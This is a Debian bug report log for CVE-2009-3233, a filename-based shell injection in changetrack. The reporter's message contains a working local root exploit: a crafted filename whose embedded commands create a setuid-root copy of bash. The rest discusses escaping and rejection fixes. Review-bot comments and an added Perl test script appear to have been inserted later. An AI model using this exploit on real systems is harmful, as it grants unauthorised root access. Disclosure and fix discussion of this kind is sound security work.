Debian Bug report logs - #546791
CVE-2009-3233: shell command injection via filename


Package: changetrack; Maintainer for changetrack is Debian QA Group <packages@qa.debian.org>; Source for changetrack is src:changetrack.

Reported by: Marek Grzybowski <marek.grzybowski@atm.com.pl>

Date: Tue, 15 Sep 2009 19:27:04 UTC

Severity: grave

Tags: security

Found in version changetrack/4.3-3

Fixed in versions changetrack/4.5-2, changetrack/4.3-3+etch1, changetrack/4.3-3+lenny1

Done: Jens Peter Secher <jps@debian.org>

Bug is archived. No further changes may be made.




Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Jens Peter Secher <jps@debian.org>:
Bug#546791; Package changetrack. (Tue, 15 Sep 2009 19:27:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Jens Peter Secher <jps@debian.org>. (Tue, 15 Sep 2009 19:27:07 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Marek Grzybowski <marek.grzybowski@atm.com.pl>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: changetrack: shell command injection via filename
Date: Tue, 15 Sep 2009 21:23:28 +0200
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole



-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages changetrack depends on:
ii  libfile-ncopy-perl            0.34-1     file copying like cp for perl
ii  perl                          5.10.0-19  Larry Wall's Practical Extraction 

Versions of packages changetrack recommends:
ii  cron                          3.0pl1-105 management of regular background p
ii  ed                            0.7-3      The classic unix line editor

changetrack suggests no packages.

-- no debconf information


It is possible to run commands as root if you have permission to create
files in a directory checked via changetrack, for example:

mkdir  /etc/test
touch  "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash  bash.ultimate
chmod  ug+s bash.ultimate
"

echo "/etc/test/*" >> /etc/changetrack.conf

wait for /etc/cron.hourly/changetrack

# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate


bash.ultimate -p ;)


Probably changetrack should not use shell commands, or should escape sh special
characters like spaces, newlines, ';' etc.

-- 
  Regards
      Marek Grzybowski




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Wed, 16 Sep 2009 19:42:11 GMT) Full text and rfc822 format available.

Message #8 received at 546791-submitter@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-submitter@bugs.debian.org
Subject: changetrack: shell command injection via filename
Date: Wed, 16 Sep 2009 21:39:20 +0200
Thanks for the bug report.

I am considering applying the following fix:

	if( "$realfile" =~ m/[\r\n\f<>`\$]/ ) {
		if(!$opt_q)
		{ print "Skipping non-sane filename '$realfile'\n";}
		@diff = (@diff, "Non-sane: '$realfile'\n");
		next;
	}
				
for outright rejecting weird filenames.  Can you come up with other
problematic characters in filenames?


Cheers,
-- 
                                                    Jens Peter Secher.
_DD6A 05B0 174E BFB2 D4D9 B52E 0EE5 978A FE63 E8A1 jpsecher gmail com_.
A. Because it breaks the logical sequence of discussion.
Q. Why is top posting bad?




Information forwarded to debian-bugs-dist@lists.debian.org, Jens Peter Secher <jps@debian.org>:
Bug#546791; Package changetrack. (Thu, 17 Sep 2009 07:42:26 GMT) Full text and rfc822 format available.

Acknowledgement sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
Extra info received and forwarded to list. Copy sent to Jens Peter Secher <jps@debian.org>. (Thu, 17 Sep 2009 07:42:27 GMT) Full text and rfc822 format available.

Message #13 received at 546791@bugs.debian.org (full text, mbox):

From: Giuseppe Iuculano <giuseppe@iuculano.it>
To: 546791@bugs.debian.org
Cc: control@bugs.debian.org, 546791-subscribe@bugs.debian.org
Subject: CVE-2009-3233: shell command injection via filename
Date: Thu, 17 Sep 2009 09:19:20 +0200
retitle 546791 CVE-2009-3233: shell command injection via filename
thanks

Hi,

this issue got a CVE id:

Name: CVE-2009-3233
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3233
Reference: MLIST:[oss-security] 20090916 CVE id request: changetrack
Reference: URL:http://www.openwall.com/lists/oss-security/2009/09/16/3
Reference: CONFIRM:http://bugs.debian.org/546791
Reference: BID:36420
Reference: URL:http://www.securityfocus.com/bid/36420
Reference: SECUNIA:36756
Reference: URL:http://secunia.com/advisories/36756

changetrack 4.3 allows local users to execute arbitrary commands via
CRLF sequences and shell metacharacters in a filename in a directory
that is checked by changetrack.

Please coordinate with the security team (team@security.debian.org) to
prepare packages for the stable and oldstable releases.

If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.

Cheers,
Giuseppe.


Changed Bug title to 'CVE-2009-3233: shell command injection via filename' from 'changetrack: shell command injection via filename' Request was from Giuseppe Iuculano <giuseppe@iuculano.it> to control@bugs.debian.org. (Thu, 17 Sep 2009 07:42:32 GMT) Full text and rfc822 format available.

Information stored :
Bug#546791; Package changetrack. (Thu, 17 Sep 2009 08:18:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Extra info received and filed, but not forwarded. (Thu, 17 Sep 2009 08:18:07 GMT) Full text and rfc822 format available.

Message #20 received at 546791-quiet@bugs.debian.org (full text, mbox):

From: Marek Grzybowski <marek.grzybowski@atm.com.pl>
To: Jens Peter Secher <jps@debian.org>, <546791-quiet@bugs.debian.org>
Cc: <546791-submitter@bugs.debian.org>, Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 10:12:01 +0200
Jens Peter Secher writes:
> Thanks for the bug report.
> 
> I am considering applying the following fix:
> 
> 	if( "$realfile" =~ m/[\r\n\f<>`\$]/ ) {
> 		if(!$opt_q)
> 		{ print "Skipping non-sane filename '$realfile'\n";}
> 		@diff = (@diff, "Non-sane: '$realfile'\n");
> 		next;
> 	}
> 				
> for outright rejecting weird filenames.  Can you come up with other
> problematic characters in filenames?

Thanks for reply.


Andrzej Lemieszek (in CC) found a few more, and he escaped them, so use of rcs should be safe too:

His patch:

--- changetrack.orig	2009-09-16 17:59:55.000000000 +0200
+++ changetrack	2009-09-16 18:00:01.000000000 +0200
@@ -224,6 +224,10 @@
 	}
 	$yestfile = $compfile . ".yesterday";     # stores current data
 	
+	my $yestfile_esc = &escape_shell_chars ($yestfile);
+        my $realfile_esc = &escape_shell_chars ($realfile);
+	my $compfile_esc = &escape_shell_chars ($compfile);
+	
 	if( ! -r "$yestfile" ) {             # can't open yesterday, doesn't exist.
 	    @diff = (@diff, "New file $realfile\n");
 	    if($opt_e) {
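Review bot: the added line `my $realfile_esc = &escape_shell_chars ($realfile);` is indented with spaces while the neighbouring added lines and the rest of the file use tabs; match the file's indentation. The three escaped copies are only correct where the string is handed to a shell; Perl-level uses such as `-r "$yestfile"` and the `@diff` messages must keep the unescaped originals, as this hunk does.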
@@ -243,12 +247,12 @@
 	    printf STAT "%o\n%s\n%s\n", $filemode, $fileuid, $filegid;
 	    close(STAT);
 	    if(!$opt_r) {
-		`cp $realfile $compfile`;
+		`cp $realfile_esc $compfile_esc`;
 		chdir($historypath);
-		`co $rcs_quiet $compfile`; # hack to make rcs work.
-		system("rcs $rcs_quiet -i -t-'this is $realfile' $compfile");
-		`rcs $rcs_quiet -U $compfile`;
-		`rm $compfile -f`;
+		`co $rcs_quiet $compfile_esc`; # hack to make rcs work.
+		system("rcs $rcs_quiet -i -t-'this is $realfile_esc' $compfile_esc");
+		`rcs $rcs_quiet -U $compfile_esc`;
+		`rm $compfile_esc -f`;
 	    }
 	}
 	
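Review bot: in `system("rcs $rcs_quiet -i -t-'this is $realfile_esc' $compfile_esc")` the escaped name is interpolated inside a single-quoted sh string, where backslashes are literal, so the RCS description will contain the escape backslashes, and a `'` in the filename becomes `\'`, which terminates the single-quoted string and breaks the command line. Prefer the list form, `system('rcs', ..., '-i', "-t-this is $realfile", $compfile)`, which hands every argument to the program without a shell; `$rcs_quiet` would then have to become a list that is empty when quiet mode is off, so that no empty argument is passed.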
@@ -295,7 +299,10 @@
 	    close(STAT);
 	}

-	open(DIFF, "diff $diffargs $yestfile $realfile |") or die "Exiting: can't run diff:$!\n";
+	if ($realfile_esc =~ /test/) {
+	    print "$realfile_esc\n";
+	}
+	open(DIFF, "diff $diffargs $yestfile_esc $realfile_esc |") or die "Exiting: can't run diff:$!\n";
 	
 	if(!$opt_q) {
 	    print "$realfile";};
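Review bot: the block `if ($realfile_esc =~ /test/) { print "$realfile_esc\n"; }` looks like leftover debugging output and prints the escaped name for every path containing "test"; remove it before applying. For the diff pipe itself, the list form of open, `open(DIFF, '-|', 'diff', split(' ', $diffargs), $yestfile, $realfile)` (assuming `$diffargs` is a whitespace-separated option string), starts diff without /bin/sh, so the filenames need no quoting at all.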
@@ -314,7 +321,7 @@
 	close(DIFF);
 	
 	if($diff) {
-	    open(DIFF, "diff -e $yestfile $realfile |") or die "Can't do diff -e:$!\n";
+	    open(DIFF, "diff -e $yestfile_esc $realfile_esc |") or die "Can't do diff -e:$!\n";
 	    # use -e to create ed commands
 	    while(<DIFF>) {
 		@ed = (@ed,"$_");                 # get the 'ed'-styled diffs. No need to understand them.
@@ -385,12 +392,12 @@
 		chdir($historypath) or die "Can't chdir to $historypath for ci: $!\n";
 		my $quiet = "";
 		print "cp $realfile $compfile\n" unless defined($opt_q);
-		`co $compfile`; # hack to make rcs work here too!
-		`cp $realfile $compfile`;         # make backup copy
+		`co $compfile_esc`; # hack to make rcs work here too!
+		`cp $realfile_esc $compfile_esc`;         # make backup copy
 		#`mv $realfile $realfile.track`;  # copy backwards, to keep modification date
 		#`cp $realfile.track $realfile`;  # make backup copy
-		system("ci $rcs_quiet -m'modification of $realfile on $date' -l $compfile");
-		`rm $compfile`;
+		system("ci $rcs_quiet -m'modification of $realfile_esc on $date' -l $compfile_esc");
+		`rm $compfile_esc`;
 	    }
 	}
     }
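Review bot: `system("ci $rcs_quiet -m'modification of $realfile_esc on $date' -l $compfile_esc")` has the same problem as the `rcs -t-'...'` call: inside sh single quotes the escaping backslashes become part of the log message and an escaped `'` ends the quoted string. The `print "cp $realfile $compfile\n"` above it now also reports a different command than the one executed; either print the escaped form or switch both to list-form `system` so the log matches what runs.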
@@ -438,6 +445,16 @@
     }
 }

+#
+# escape shell meta characters and spaces
+sub escape_shell_chars
+{
+    my $arg = shift;
+    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
+    return $arg;
+}
+
+
 # $Log: changetrack,v $
 # Revision 4.3  2005/02/28 16:50:23  cjmorlan
 # Removed debugging lines!
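Review bot: `escape_shell_chars` cannot preserve a newline: `\s` matches `\n`, and backslash-newline is a line continuation that sh removes, so the argument the command receives differs from the real filename (the follow-up messages in this thread confirm this). The character class also omits `\` itself, so a backslash in a name is consumed by the shell, and omits `?` and `~`, which remain subject to glob and tilde expansion. Wrapping the whole argument in single quotes with `s/'/'\\''/g`, as proposed later in this thread, handles every byte except NUL, and list-form `system`/`open` avoids the shell entirely.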




Is that all of them? We don't know ;)


-- 
Regards
Marek Grzybowski




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Thu, 17 Sep 2009 08:18:09 GMT) Full text and rfc822 format available.

Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Thu, 17 Sep 2009 17:51:07 GMT) Full text and rfc822 format available.

Message #26 received at 546791-submitter@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-submitter@bugs.debian.org
Cc: Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 19:43:57 +0200
2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
>
> Andrzej Lemieszek (in CC) found a few more, and he escaped them, so use of rcs should be safe too:
>
> His patch:
>
[...]
> +        my $realfile_esc = &escape_shell_chars ($realfile);
[...]
> -               `cp $realfile $compfile`;
> +               `cp $realfile_esc $compfile_esc`;
[...]
> +sub escape_shell_chars
> +{
> +    my $arg = shift;
> +    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
> +    return $arg;
> +}

This is not going to work.  When $realfile_esc is different from
$realfile, then it makes no sense to copy the non-existent
$realfile_esc.  I will go for the solution of rejecting weird file
names.

Cheers,
-- 
                                                    Jens Peter Secher.
_DD6A 05B0 174E BFB2 D4D9 B52E 0EE5 978A FE63 E8A1 jpsecher gmail com_.
A. Because it breaks the logical sequence of discussion.
Q. Why is top posting bad?




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Thu, 17 Sep 2009 21:03:04 GMT) Full text and rfc822 format available.

Message #29 received at 546791-submitter@bugs.debian.org (full text, mbox):

From: "Andrzej Lemieszek (ATM S.A.)" <andrzej.lemieszek@atm.com.pl>
To: Jens Peter Secher <jps@debian.org>
Cc: 546791-submitter@bugs.debian.org
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 22:54:37 +0200
Jens Peter Secher writes:
> 2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
>> Andrzej Lemieszek (in CC) found a few more, and he escaped them, so use of rcs should be safe too:
>>
>> His patch:
>>
> [...]
>> +        my $realfile_esc = &escape_shell_chars ($realfile);
> [...]
>> -               `cp $realfile $compfile`;
>> +               `cp $realfile_esc $compfile_esc`;
> [...]
>> +sub escape_shell_chars
>> +{
>> +    my $arg = shift;
>> +    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
>> +    return $arg;
>> +}
> 
> This is not going to work.  When $realfile_esc is different from
> $realfile, then it makes no sense to copy the non-existent
> $realfile_esc.  I will go for the solution of rejecting weird file
> names.
I'm sorry, but it works. $realfile_esc is translated back by the shell to
its original filename and the target program (cp in this case) opens $realfile.

Of course, rejecting weird names is also a solution, but after such a modification changetrack
still will not handle correctly files with the characters mentioned above (sometimes these filenames
are created by a non-malicious user, e.g. filenames with spaces).


- --
Andrzej Lemieszek - Zespół Wsparcia Systemów i Aplikacji
ATM S.A., ul. Grochowska 21a, 04-186 Warszawa, Poland; http://www.atm.com.pl
tel. +48 22 5156357;  PGP key ID: 0xD8A5913F




Information stored :
Bug#546791; Package changetrack. (Thu, 17 Sep 2009 21:54:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Extra info received and filed, but not forwarded. (Thu, 17 Sep 2009 21:54:03 GMT) Full text and rfc822 format available.

Message #34 received at 546791-quiet@bugs.debian.org (full text, mbox):

From: Marek Grzybowski <marek.grzybowski@atm.com.pl>
To: Jens Peter Secher <jps@debian.org>, 546791-quiet@bugs.debian.org
Cc: 546791-submitter@bugs.debian.org, Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 23:49:15 +0200
Jens Peter Secher wrote:
> 2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
>> Andrzej Lemieszek (in CC) found a few more, and he escaped them, so use of rcs should be safe too:
>>
>> His patch:
>>
> [...]
>> +        my $realfile_esc = &escape_shell_chars ($realfile);
> [...]
>> -               `cp $realfile $compfile`;
>> +               `cp $realfile_esc $compfile_esc`;
> [...]
>> +sub escape_shell_chars
>> +{
>> +    my $arg = shift;
>> +    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
>> +    return $arg;
>> +}
> 
> This is not going to work.  When $realfile_esc is different from
> $realfile, then it makes no sense to copy the non-existent
> $realfile_esc.  I will go for the solution of rejecting weird file
> names.

You're right Jens, it's not good enough with "enters" (newlines).

I also checked ./bashline.c in the bash sources:

 /* characters that need to be quoted when appearing in filenames. */
  rl_filename_quote_characters = " \t\n\\\"'@<>=;|&()#$`?*[!:{";        /*}*/

I did some tests and came up with this:
$ cat  test.pl
#!/usr/bin/perl
use strict;
use warnings;
use File::NCopy qw(copy);

# test file name: the characters bash quotes in filenames, plus a newline
my $realfile="blablabla \t\n\\\"'@<>=;|&()#\$`?*[!:{";

my $realfile_esc = &escape_shell_chars ($realfile);

# wrap the whole argument in single quotes; an embedded ' becomes '\''
# (close the quoted string, escape the quote, reopen)
sub escape_shell_chars
{
    my $arg = shift;
    $arg =~ s/[']/\'\\$&'/g;
    return "'".$arg."'";
}

print "$realfile\n";
print "$realfile_esc\n";

copy( "test.pl" , $realfile);
# set -x; makes sh trace the cp command so the unquoted argument is visible
print `set -x; cp test.pl $realfile_esc`;




-- 
Regards
   Marek Grzybowski




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Thu, 17 Sep 2009 21:54:05 GMT) Full text and rfc822 format available.

Reply sent to Jens Peter Secher <jps@debian.org>:
You have taken responsibility. (Thu, 17 Sep 2009 22:39:43 GMT) Full text and rfc822 format available.

Notification sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug acknowledged by developer. (Thu, 17 Sep 2009 22:39:43 GMT) Full text and rfc822 format available.

Message #42 received at 546791-close@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-close@bugs.debian.org
Subject: Bug#546791: fixed in changetrack 4.5-2
Date: Thu, 17 Sep 2009 22:18:08 +0000
Source: changetrack
Source-Version: 4.5-2

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.5-2.diff.gz
  to pool/main/c/changetrack/changetrack_4.5-2.diff.gz
changetrack_4.5-2.dsc
  to pool/main/c/changetrack/changetrack_4.5-2.dsc
changetrack_4.5-2_all.deb
  to pool/main/c/changetrack/changetrack_4.5-2_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 546791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <jps@debian.org> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.5-2
Distribution: unstable
Urgency: low
Maintainer: Jens Peter Secher <jps@debian.org>
Changed-By: Jens Peter Secher <jps@debian.org>
Description: 
 changetrack - monitor changes to (configuration) files
Closes: 546791
Changes: 
 changetrack (4.5-2) unstable; urgency=low
 .
   * [reject-weird-filenames.diff] Fix possible local exploit by rejecting
     filenames with unsafe characters (cf. CVE-2009-3233).  Thanks to Marek
     Grzybowski and Andrzej Lemieszek.
     (Closes: #546791)






Information stored :
Bug#546791; Package changetrack. (Fri, 18 Sep 2009 00:36:14 GMT) Full text and rfc822 format available.

Acknowledgement sent to Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>:
Extra info received and filed, but not forwarded. (Fri, 18 Sep 2009 00:36:14 GMT) Full text and rfc822 format available.

Message #47 received at 546791-quiet@bugs.debian.org (full text, mbox):

From: Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
To: Marek Grzybowski <marek.grzybowski@atm.com.pl>
Cc: Jens Peter Secher <jps@debian.org>, 546791-quiet@bugs.debian.org, 546791-submitter@bugs.debian.org
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Fri, 18 Sep 2009 02:25:29 +0200
Marek Grzybowski writes:
> Jens Peter Secher wrote:
>> 2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
(...)
>>> Andrzej Lemieszek (in CC) found a few more, and he escaped them, so use of rcs should be safe too:
>>>
>>> His patch:
>>>
>> [...]
>>> +        my $realfile_esc = &escape_shell_chars ($realfile);
>> [...]
>>> -               `cp $realfile $compfile`;
>>> +               `cp $realfile_esc $compfile_esc`;
>> [...]
>>> +sub escape_shell_chars
>>> +{
>>> +    my $arg = shift;
>>> +    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
>>> +    return $arg;
>>> +}
>> This is not going to work.  When $realfile_esc is different from
>> $realfile, then it makes no sense to copy the non-existent
>> $realfile_esc.  I will go for the solution of rejecting weird file
>> names.
> 
> You're right Jens, it's not good enough with "enters" (newlines).
> 
> I also checked ./bashline.c in the bash sources:
> 
>  /* characters that need to be quoted when appearing in filenames. */
>   rl_filename_quote_characters = " \t\n\\\"'@<>=;|&()#$`?*[!:{";        /*}*/
> 
> I did some tests and came up with this:
Yeah, Marku, you are right. I didn't test my patch with newline characters (I used semicolons for
testing your exploit), so I didn't notice that newline is a "special case" of special characters
(see bash(1), section QUOTING) and can't be easily quoted using a backslash.

Your solution using single quotes is much better (it smartly works around the limitation of single
quotes, that inside a single-quoted string single quotes can't be escaped). In the shorter form it
can look like this:

sub escape_shell_chars
{
    my $arg = shift;
    $arg =~ s/'/'\\''/g;
    return "'$arg'";
}

- --
Andrzej Lemieszek




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Fri, 18 Sep 2009 00:36:15 GMT) Full text and rfc822 format available.
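As an added example, not code from changetrack or from anyone in this thread, the Perl script below runs the three approaches discussed here side by side: the reject-list from message #8, the backslash escaping from the first patch, and the single-quote wrapping from messages #34 and #47, each fed a constructed filename built from the rl_filename_quote_characters list quoted above, and it adds Perl's list-form system() and open(), which skip /bin/sh altogether. The temporary directory, the "marker" file contents and the function names are the example's own.

```perl
#!/usr/bin/perl
# Added example, not changetrack's code: the three approaches discussed in
# this bug (reject-list, backslash escaping, single-quote wrapping) tried
# against a constructed filename, plus Perl's shell-free list-form calls.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Reject-list from message #8, as a predicate: true when the name is allowed.
sub is_sane_filename {
    my ($name) = @_;
    return $name !~ m/[\r\n\f<>`\$]/;
}

# Backslash escaping from the first patch in this thread.
sub escape_backslash {
    my $arg = shift;
    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
    return $arg;
}

# Single-quote wrapping from message #47: inside '...' every byte is
# literal; an embedded ' is closed, backslash-escaped and reopened.
sub escape_single_quote {
    my $arg = shift;
    $arg =~ s/'/'\\''/g;
    return "'$arg'";
}

# Ask /bin/sh to read $path back through $quoter's output. True only if the
# shell resolved the quoted text to the very same file. sh's own complaints
# about broken quoting are silenced so the verdict stays readable.
sub roundtrip_via_shell {
    my ($path, $quoter) = @_;
    my $quoted = $quoter->($path);
    open(my $saved_err, '>&', \*STDERR) or die "dup STDERR: $!";
    open(STDERR, '>', '/dev/null')      or die "silence STDERR: $!";
    my $out = `cat $quoted`;
    open(STDERR, '>&', $saved_err)      or die "restore STDERR: $!";
    return defined $out && $out eq "marker\n";
}

# Shell-free copy: list-form system() hands argv straight to execve.
sub copy_without_shell {
    my ($src, $dst) = @_;
    return system('cp', '--', $src, $dst) == 0;
}

# Shell-free diff: four-argument pipe open also skips /bin/sh entirely.
# Returns the diff output lines (empty list when the files are identical).
sub diff_without_shell {
    my ($old, $new) = @_;
    open(my $d, '-|', 'diff', '--', $old, $new) or die "diff: $!";
    my @lines = <$d>;
    close $d;
    return @lines;
}

my $dir = tempdir(CLEANUP => 1);
# Constructed hostile name: bash's rl_filename_quote_characters set quoted in
# this thread, including a newline, which backslash escaping cannot carry.
my $nasty = "$dir/blablabla \t\n\\\"'\@<>=;|&()#\$`?*[!:{";
open(my $fh, '>', $nasty) or die "create: $!";
print $fh "marker\n";
close $fh;

printf "reject-list:   %s\n", is_sane_filename($nasty) ? 'accepted' : 'rejected';
printf "backslash:     %s\n",
    roundtrip_via_shell($nasty, \&escape_backslash) ? 'same file' : 'BROKEN';
printf "single-quote:  %s\n",
    roundtrip_via_shell($nasty, \&escape_single_quote) ? 'same file' : 'BROKEN';

my $copy = "$dir/copy";
printf "list system(): %s\n", copy_without_shell($nasty, $copy) ? 'copied' : 'FAILED';
printf "list open():   %s\n", diff_without_shell($nasty, $copy) ? 'differs' : 'identical';
```

On a Linux filesystem the name is accepted as-is (only `/` and NUL are forbidden), so the script exercises the real failure: the backslash form loses the newline and leaves an unterminated double quote, while the single-quote form and the list-form calls all reach the same file.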

Reply sent to Jens Peter Secher <jps@debian.org>:
You have taken responsibility. (Thu, 24 Sep 2009 02:36:03 GMT) Full text and rfc822 format available.

Notification sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug acknowledged by developer. (Thu, 24 Sep 2009 02:36:03 GMT) Full text and rfc822 format available.

Message #55 received at 546791-close@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-close@bugs.debian.org
Subject: Bug#546791: fixed in changetrack 4.3-3+etch1
Date: Thu, 24 Sep 2009 01:57:50 +0000
Source: changetrack
Source-Version: 4.3-3+etch1

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.3-3+etch1.diff.gz
  to pool/main/c/changetrack/changetrack_4.3-3+etch1.diff.gz
changetrack_4.3-3+etch1.dsc
  to pool/main/c/changetrack/changetrack_4.3-3+etch1.dsc
changetrack_4.3-3+etch1_all.deb
  to pool/main/c/changetrack/changetrack_4.3-3+etch1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 546791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <jps@debian.org> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.7
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+etch1
Distribution: oldstable-security
Urgency: medium
Maintainer: Jens Peter Secher <jps@debian.org>
Changed-By: Jens Peter Secher <jps@debian.org>
Description: 
 changetrack - configuration-file change tracker
Closes: 546791
Changes: 
 changetrack (4.3-3+etch1) oldstable-security; urgency=medium
 .
   * Fix possible local exploit by rejecting filenames with unsafe
     characters (cf. CVE-2009-3233).  Thanks to Marek Grzybowski and
     Andrzej Lemieszek.
     (Closes: #546791)






Reply sent to Jens Peter Secher <jps@debian.org>:
You have taken responsibility. (Wed, 16 Dec 2009 23:42:03 GMT) Full text and rfc822 format available.

Notification sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug acknowledged by developer. (Wed, 16 Dec 2009 23:42:03 GMT) Full text and rfc822 format available.

Message #60 received at 546791-close@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-close@bugs.debian.org
Subject: Bug#546791: fixed in changetrack 4.3-3+lenny1
Date: Wed, 16 Dec 2009 23:38:46 +0000
Source: changetrack
Source-Version: 4.3-3+lenny1

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.3-3+lenny1.diff.gz
  to main/c/changetrack/changetrack_4.3-3+lenny1.diff.gz
changetrack_4.3-3+lenny1.dsc
  to main/c/changetrack/changetrack_4.3-3+lenny1.dsc
changetrack_4.3-3+lenny1_all.deb
  to main/c/changetrack/changetrack_4.3-3+lenny1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 546791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <jps@debian.org> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+lenny1
Distribution: stable-security
Urgency: medium
Maintainer: Jens Peter Secher <jps@debian.org>
Changed-By: Jens Peter Secher <jps@debian.org>
Description: 
 changetrack - configuration-file change tracker
Closes: 546791
Changes: 
 changetrack (4.3-3+lenny1) stable-security; urgency=medium
 .
   * Fix possible local exploit by rejecting filenames with unsafe
     characters (cf. CVE-2009-3233).  Thanks to Marek Grzybowski and
     Andrzej Lemieszek.
     (Closes: #546791)






Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 31 Jan 2010 07:42:22 GMT) Full text and rfc822 format available.



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 10:57:08 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.